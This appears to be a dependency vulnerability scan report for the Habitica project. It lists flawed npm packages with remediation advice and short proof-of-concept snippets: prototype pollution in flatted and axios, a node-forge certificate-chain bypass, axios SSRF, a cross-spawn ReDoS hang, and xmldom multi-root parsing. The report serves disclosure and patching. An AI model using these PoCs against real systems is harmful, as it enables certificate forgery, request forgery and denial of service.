Find, fix and prevent vulnerabilities in your code.
critical severity
- Vulnerable module: xmldom
- Introduced through: in-app-purchase@1.11.4
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › xmldom@0.1.19
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › xml-crypto@0.10.1 › xmldom@0.1.19
Overview
xmldom is a pure JavaScript, W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module.
Affected versions of this package are vulnerable to Improper Input Validation when parsing XML that is not well-formed and contains multiple top-level elements. All root nodes are added to the childNodes collection of the Document without any error being reported or thrown.
Workarounds
One of the following approaches might help, depending on your use case:
- Instead of searching for elements in the whole DOM, only search in the documentElement.
- Reject a document that has more than one childNode.
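The child-count workaround can be sketched as follows; this is a minimal sketch using a stub object in place of a real xmldom Document (the helper name and stubs are hypothetical, but the nodeType and childNodes properties match the DOM API):

```javascript
// Reject a parsed document that has more than one element among its
// top-level childNodes: well-formed XML has exactly one root element.
function assertSingleRoot(doc) {
  const roots = Array.from(doc.childNodes)
    .filter((node) => node.nodeType === 1); // 1 === ELEMENT_NODE
  if (roots.length !== 1) {
    throw new Error('Rejected: document has ' + roots.length + ' root elements');
  }
  return doc.documentElement; // search only under the single root
}

// Stub documents standing in for DOMParser output:
const root = { nodeType: 1 };
const wellFormed = { childNodes: [{ nodeType: 7 }, root], documentElement: root };
const malformed = { childNodes: [{ nodeType: 1 }, { nodeType: 1 }] };
```

In real code, `doc` would be the object returned by `new DOMParser().parseFromString(...)`, as in the PoC below.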
PoC
var DOMParser = require('xmldom').DOMParser;
var xmlData = '<?xml version="1.0" encoding="UTF-8"?>\n' +
'<root>\n' +
' <branch girth="large">\n' +
' <leaf color="green" />\n' +
' </branch>\n' +
'</root>\n' +
'<root>\n' +
' <branch girth="twig">\n' +
' <leaf color="gold" />\n' +
' </branch>\n' +
'</root>\n';
var xmlDOM = new DOMParser().parseFromString(xmlData);
console.log(xmlDOM.toString());
This results in the following output:
<?xml version="1.0" encoding="UTF-8"?><root>
<branch girth="large">
<leaf color="green"/>
</branch>
</root>
<root>
<branch girth="twig">
<leaf color="gold"/>
</branch>
</root>
Remediation
There is no fixed version for xmldom.
References
critical severity
- Vulnerable module: form-data
- Introduced through: amazon-payments@0.2.9, in-app-purchase@1.11.4 and others
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › amazon-payments@0.2.9 › request@2.88.2 › form-data@2.3.3
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › request@2.88.0 › form-data@2.3.3
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp.spritesmith@6.13.1 › spritesmith@3.5.1 › pixelsmith@2.6.0 › get-pixels@3.3.3 › request@2.88.2 › form-data@2.3.3
Overview
Affected versions of this package are vulnerable to Predictable Value Range from Previous Values via the boundary value, which uses Math.random(). An attacker can manipulate HTTP request boundaries by exploiting predictable values, potentially leading to HTTP parameter pollution.
Remediation
Upgrade form-data to version 2.5.4, 3.0.4, 4.0.4 or higher.
References
critical severity
- Vulnerable module: babel-traverse
- Introduced through: babel-preset-env@1.7.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-block-scoping@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-classes@6.24.1 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-parameters@6.24.1 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-block-scoping@6.26.0 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-classes@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-computed-properties@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-modules-commonjs@6.26.2 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-modules-amd@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-modules-systemjs@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-modules-umd@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-parameters@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-classes@6.24.1 › babel-helper-function-name@6.24.1 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-function-name@6.24.1 › babel-helper-function-name@6.24.1 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-async-to-generator@6.24.1 › babel-helper-remap-async-to-generator@6.24.1 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-classes@6.24.1 › babel-helper-replace-supers@6.24.1 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-object-super@6.24.1 › babel-helper-replace-supers@6.24.1 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-parameters@6.24.1 › babel-helper-call-delegate@6.24.1 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-classes@6.24.1 › babel-helper-function-name@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-function-name@6.24.1 › babel-helper-function-name@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-async-to-generator@6.24.1 › babel-helper-remap-async-to-generator@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-classes@6.24.1 › babel-helper-replace-supers@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-object-super@6.24.1 › babel-helper-replace-supers@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-modules-amd@6.24.1 › babel-plugin-transform-es2015-modules-commonjs@6.26.2 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-modules-umd@6.24.1 › babel-plugin-transform-es2015-modules-amd@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-async-to-generator@6.24.1 › babel-helper-remap-async-to-generator@6.24.1 › babel-helper-function-name@6.24.1 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-classes@6.24.1 › babel-helper-define-map@6.26.0 › babel-helper-function-name@6.24.1 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-exponentiation-operator@6.24.1 › babel-helper-builder-binary-assignment-operator-visitor@6.24.1 › babel-helper-explode-assignable-expression@6.24.1 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-async-to-generator@6.24.1 › babel-helper-remap-async-to-generator@6.24.1 › babel-helper-function-name@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-classes@6.24.1 › babel-helper-define-map@6.26.0 › babel-helper-function-name@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-modules-umd@6.24.1 › babel-plugin-transform-es2015-modules-amd@6.24.1 › babel-plugin-transform-es2015-modules-commonjs@6.26.2 › babel-template@6.26.0 › babel-traverse@6.26.0
Overview
Affected versions of this package are vulnerable to Incomplete List of Disallowed Inputs when using plugins that rely on the path.evaluate() or path.evaluateTruthy() internal Babel methods.
Note:
This is only exploitable when compiling attacker-crafted code with known affected plugins such as @babel/plugin-transform-runtime, @babel/preset-env when using its useBuiltIns option, and any "polyfill provider" plugin that depends on @babel/helper-define-polyfill-provider. No other plugins under the @babel/ namespace are impacted, but third-party plugins might be.
Users who only compile trusted code are not impacted.
Workaround
Users who are unable to upgrade the library can upgrade the affected plugins instead, to avoid triggering the vulnerable code path in affected @babel/traverse.
Remediation
There is no fixed version for babel-traverse.
References
critical severity
new
- Vulnerable module: flatted
- Introduced through: eslint-config-habitrpg@6.2.3
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › eslint-config-habitrpg@6.2.3 › eslint@6.8.0 › file-entry-cache@5.0.1 › flat-cache@2.0.1 › flatted@2.0.2
Overview
Affected versions of this package are vulnerable to Prototype Pollution via the parse function. An attacker can manipulate the prototype chain by supplying a specially crafted string that causes the returned object to reference Array.prototype, allowing subsequent writes to that property to affect the global prototype and potentially lead to denial of service or code execution.
PoC
const Flatted = require('flatted');
const parsed = Flatted.parse('[{"x":"__proto__"}]');
parsed.x.polluted = 'pwned';
console.log([].polluted); // prints 'pwned': Array.prototype was polluted
Details
Prototype Pollution is a vulnerability affecting JavaScript. It refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, the prototype of a base object by injecting other values. Properties on Object.prototype are then inherited by all JavaScript objects through the prototype chain. When that happens, this leads either to denial of service by triggering JavaScript exceptions, or to tampering with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.
There are two main ways in which the pollution of prototypes occurs:
- Unsafe Object recursive merge
- Property definition by path
Unsafe Object recursive merge
The logic of a vulnerable recursive merge function follows the following high-level model:
merge (target, source)
foreach property of source
if property exists and is an object on both the target and the source
merge(target[property], source[property])
else
target[property] = source[property]
When the source object contains a property named __proto__ (for example, defined with Object.defineProperty()), the condition that checks whether the property exists and is an object on both the target and the source passes, and the merge recurses with Object.prototype as the target and the attacker-defined object as the source. Properties are then copied onto the Object prototype.
Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).
lodash and Hoek are examples of libraries susceptible to recursive merge attacks.
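The high-level model above can be demonstrated with a deliberately vulnerable merge; this is a sketch, not the code of any particular library:

```javascript
// Deliberately vulnerable recursive merge following the model above.
function merge(target, source) {
  for (const key of Object.keys(source)) {
    if (key in target &&
        typeof target[key] === 'object' && target[key] !== null &&
        typeof source[key] === 'object' && source[key] !== null) {
      merge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// JSON.parse creates "__proto__" as an own, enumerable property, so the
// merge recurses into Object.prototype and copies the attacker's values.
const payload = JSON.parse('{"__proto__": {"polluted": "yes"}}');
merge({}, payload);

const probe = {}.polluted;        // "yes": inherited by every object
delete Object.prototype.polluted; // undo the pollution
```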
Property definition by path
There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)
If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.
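A sketch of such a path-based setter with the theFunction(object, path, value) shape described above (a hypothetical helper, not any specific library's implementation):

```javascript
// Naive path-based property setter: setPath(obj, 'a.b.c', value)
function setPath(obj, path, value) {
  const keys = path.split('.');
  let cur = obj;
  for (let i = 0; i < keys.length - 1; i++) {
    if (typeof cur[keys[i]] !== 'object' || cur[keys[i]] === null) {
      cur[keys[i]] = {};
    }
    cur = cur[keys[i]]; // "__proto__" walks up to Object.prototype
  }
  cur[keys[keys.length - 1]] = value;
  return obj;
}

// An attacker-controlled path reaches the global prototype:
setPath({}, '__proto__.myValue', 42);

const leaked = {}.myValue;      // 42: inherited from Object.prototype
delete Object.prototype.myValue;
```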
Types of attacks
There are a few methods by which Prototype Pollution can be manipulated:
| Type | Origin | Short description |
|---|---|---|
| Denial of service (DoS) | Client | This is the most likely attack. DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf). The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service. For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail. |
| Remote Code Execution | Client | Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation. For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code. |
| Property Injection | Client | The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens. For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges. |
Affected environments
The following environments are susceptible to a Prototype Pollution attack:
Application server
Web server
Web browser
How to prevent
- Freeze the prototype: use Object.freeze(Object.prototype).
- Require schema validation of JSON input.
- Avoid using unsafe recursive merge functions.
- Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.
- As a best practice, use Map instead of Object.
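The freeze, null-prototype, and Map mitigations can be sketched directly (run in isolation, since freezing Object.prototype affects the whole process):

```javascript
// Freeze the prototype: writes to it are rejected afterwards.
Object.freeze(Object.prototype);
const wrote = Reflect.set(Object.prototype, 'polluted', 'pwned');
// wrote === false: the frozen prototype refused the new property

// Objects without prototypes: "__proto__" is just an ordinary key.
const safe = Object.create(null);
safe['__proto__'] = { polluted: true }; // an own data property, nothing more

// Map: keys are plain data, never property lookups on a prototype chain.
const m = new Map();
m.set('__proto__', { polluted: true });
```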
For more information on this vulnerability type:
Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018
Remediation
Upgrade flatted to version 3.4.2 or higher.
References
critical severity
- Vulnerable module: node-forge
- Introduced through: @parse/node-apn@5.2.3
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › @parse/node-apn@5.2.3 › node-forge@1.3.1
Remediation: Upgrade to @parse/node-apn@7.0.0.
Overview
node-forge is a JavaScript implementation of network transports, cryptography, ciphers, PKI, message digests, and various utilities.
Affected versions of this package are vulnerable to Interpretation Conflict via the asn1.validate() function. An attacker can cause schema validation to become desynchronized, resulting in semantic divergence that may allow bypassing cryptographic verifications and security decisions, by passing in ASN.1 data with optional parameters that may be interpreted as object boundaries.
Remediation
Upgrade node-forge to version 1.3.2 or higher.
References
critical severity
- Vulnerable module: xml-crypto
- Introduced through: in-app-purchase@1.11.4
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › xml-crypto@0.10.1
Overview
xml-crypto is an XML digital signature and encryption library for Node.js.
Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature through the SignedInfo references. An attacker can modify a valid signed XML message to bypass signature verification checks by altering critical identity or access control attributes, enabling privilege escalation or impersonation.
Remediation
Upgrade xml-crypto to version 2.1.6, 3.2.1, 6.0.1 or higher.
References
critical severity
- Vulnerable module: xml-crypto
- Introduced through: in-app-purchase@1.11.4
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › xml-crypto@0.10.1
Overview
xml-crypto is an XML digital signature and encryption library for Node.js.
Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature due to the manipulation of the DigestValue element within the XML structure. An attacker can alter the integrity of the XML document and bypass security checks by inserting or modifying comments within the DigestValue element.
Remediation
Upgrade xml-crypto to version 2.1.6, 3.2.1, 6.0.1 or higher.
References
critical severity
new
- Vulnerable module: node-forge
- Introduced through: @parse/node-apn@5.2.3
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › @parse/node-apn@5.2.3 › node-forge@1.3.1
Remediation: Upgrade to @parse/node-apn@8.0.0.
Overview
node-forge is a JavaScript implementation of network transports, cryptography, ciphers, PKI, message digests, and various utilities.
Affected versions of this package are vulnerable to Improper Certificate Validation in the verifyCertificateChain function. An attacker can gain unauthorized certificate authority capabilities by presenting a certificate chain where an intermediate certificate lacks both basicConstraints and keyUsage extensions, allowing the attacker to sign certificates for arbitrary domains and have them accepted as valid.
PoC
const forge = require('node-forge');
const pki = forge.pki;
function generateKeyPair() {
return pki.rsa.generateKeyPair({ bits: 2048, e: 0x10001 });
}
console.log('=== node-forge basicConstraints Bypass PoC ===\n');
// 1. Create a legitimate Root CA (self-signed, with basicConstraints cA=true)
const rootKeys = generateKeyPair();
const rootCert = pki.createCertificate();
rootCert.publicKey = rootKeys.publicKey;
rootCert.serialNumber = '01';
rootCert.validity.notBefore = new Date();
rootCert.validity.notAfter = new Date();
rootCert.validity.notAfter.setFullYear(rootCert.validity.notBefore.getFullYear() + 10);
const rootAttrs = [
{ name: 'commonName', value: 'Legitimate Root CA' },
{ name: 'organizationName', value: 'PoC Security Test' }
];
rootCert.setSubject(rootAttrs);
rootCert.setIssuer(rootAttrs);
rootCert.setExtensions([
{ name: 'basicConstraints', cA: true, critical: true },
{ name: 'keyUsage', keyCertSign: true, cRLSign: true, critical: true }
]);
rootCert.sign(rootKeys.privateKey, forge.md.sha256.create());
// 2. Create a "leaf" certificate signed by root — NO basicConstraints, NO keyUsage
// This certificate should NOT be allowed to sign other certificates
const leafKeys = generateKeyPair();
const leafCert = pki.createCertificate();
leafCert.publicKey = leafKeys.publicKey;
leafCert.serialNumber = '02';
leafCert.validity.notBefore = new Date();
leafCert.validity.notAfter = new Date();
leafCert.validity.notAfter.setFullYear(leafCert.validity.notBefore.getFullYear() + 5);
const leafAttrs = [
{ name: 'commonName', value: 'Non-CA Leaf Certificate' },
{ name: 'organizationName', value: 'PoC Security Test' }
];
leafCert.setSubject(leafAttrs);
leafCert.setIssuer(rootAttrs);
// NO basicConstraints extension — NO keyUsage extension
leafCert.sign(rootKeys.privateKey, forge.md.sha256.create());
// 3. Create a "victim" certificate signed by the leaf
// This simulates an attacker using a non-CA cert to forge certificates
const victimKeys = generateKeyPair();
const victimCert = pki.createCertificate();
victimCert.publicKey = victimKeys.publicKey;
victimCert.serialNumber = '03';
victimCert.validity.notBefore = new Date();
victimCert.validity.notAfter = new Date();
victimCert.validity.notAfter.setFullYear(victimCert.validity.notBefore.getFullYear() + 1);
const victimAttrs = [
{ name: 'commonName', value: 'victim.example.com' },
{ name: 'organizationName', value: 'Victim Corp' }
];
victimCert.setSubject(victimAttrs);
victimCert.setIssuer(leafAttrs);
victimCert.sign(leafKeys.privateKey, forge.md.sha256.create());
// 4. Verify the chain: root -> leaf -> victim
const caStore = pki.createCaStore([rootCert]);
try {
const result = pki.verifyCertificateChain(caStore, [victimCert, leafCert]);
console.log('[VULNERABLE] Chain verification SUCCEEDED: ' + result);
console.log(' node-forge accepted a non-CA certificate as an intermediate CA!');
console.log(' This violates RFC 5280 Section 6.1.4.');
} catch (e) {
console.log('[SECURE] Chain verification FAILED (expected): ' + e.message);
}
Remediation
Upgrade node-forge to version 1.4.0 or higher.
References
high severity
- Vulnerable module: axios
- Introduced through: node-gcm@1.1.4
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › node-gcm@1.1.4 › axios@1.6.8
Overview
axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) through unexpected behavior where requests for path-relative URLs get processed as protocol-relative URLs. An attacker can manipulate the server to make unauthorized requests by exploiting this behavior.
PoC
const axios = require('axios');
const client = axios.create({
  baseURL: 'https://userapi.example.com',
});
// userId = '12345';
const userId = '/google.com';
client.get(`/${userId}`).then(function (response) {
console.log(`config.baseURL: ${response.config.baseURL}`);
console.log(`config.method: ${response.config.method}`);
console.log(`config.url: ${response.config.url}`);
console.log(`res.responseUrl: ${response.request.res.responseUrl}`);
});
Output:
config.baseURL: https://userapi.example.com
config.method: get
config.url: //google.com
res.responseUrl: http://www.google.com/
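The underlying behavior is standard URL resolution: a URL beginning with // is protocol-relative, so it keeps the scheme but replaces the base host. A sketch of a guard that resolves first and then checks the origin (the function and variable names are illustrative):

```javascript
// "//google.com" is protocol-relative: resolution keeps "https:" from
// the base URL but replaces its host.
const base = 'https://userapi.example.com';
const resolved = new URL('//google.com', base);
// resolved.host is 'google.com', not 'userapi.example.com'

// Guard: resolve the final URL, then require the original origin.
function safeUserUrl(userId, baseURL) {
  const url = new URL('/' + userId, baseURL);
  if (url.origin !== new URL(baseURL).origin) {
    throw new Error('Refusing cross-origin request to ' + url.host);
  }
  return url.href;
}
```

With userId = '12345' this returns the expected API URL; with userId = '/google.com' the resolved origin changes and the guard throws.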
Remediation
Upgrade axios to version 1.7.4 or higher.
References
high severity
- Vulnerable module: axios
- Introduced through: @slack/webhook@6.1.0, apple-auth@1.0.9 and others
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › @slack/webhook@6.1.0 › axios@0.21.4
Remediation: Upgrade to @slack/webhook@7.0.0.
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › apple-auth@1.0.9 › axios@0.21.4
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › amplitude@6.0.0 › axios@0.26.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › node-gcm@1.1.4 › axios@1.6.8
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › winston-loggly-bulk@3.3.3 › node-loggly-bulk@4.0.2 › axios@1.7.4
Overview
axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Prototype Pollution via the mergeConfig function. An attacker can cause the application to crash by supplying a malicious configuration object containing a __proto__ property, typically by leveraging JSON.parse().
PoC
import axios from "axios";
const maliciousConfig = JSON.parse('{"__proto__": {"x": 1}}');
await axios.get("https://domain/get", maliciousConfig);
Remediation
Upgrade axios to version 0.30.3, 1.13.5 or higher.
References
high severity
- Vulnerable module: cross-spawn
- Introduced through: gulp-imagemin@7.1.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › exec-buffer@3.2.0 › execa@0.7.0 › cross-spawn@5.1.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-build@3.0.0 › execa@0.7.0 › cross-spawn@5.1.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-build@3.0.0 › execa@0.7.0 › cross-spawn@5.1.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-build@3.0.0 › execa@0.7.0 › cross-spawn@5.1.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-wrapper@4.1.0 › bin-check@4.1.0 › execa@0.7.0 › cross-spawn@5.1.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-wrapper@4.1.0 › bin-check@4.1.0 › execa@0.7.0 › cross-spawn@5.1.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-wrapper@4.1.0 › bin-check@4.1.0 › execa@0.7.0 › cross-spawn@5.1.0
Overview
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can exhaust CPU and hang the program by supplying a very large, carefully crafted string.
PoC
const { argument } = require('cross-spawn/lib/util/escape');
var str = "";
for (var i = 0; i < 1000000; i++) {
str += "\\";
}
str += "◎";
console.log("start")
argument(str)
console.log("end")
// run `npm install cross-spawn` and `node attack.js`;
// the program then hangs indefinitely with high CPU usage
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
- A - The string must start with the letter 'A'.
- (B|C+)+ - The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
- D - Finally, we ensure this section of the string ends with a 'D'.
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
In most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30-character-long string takes around 52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
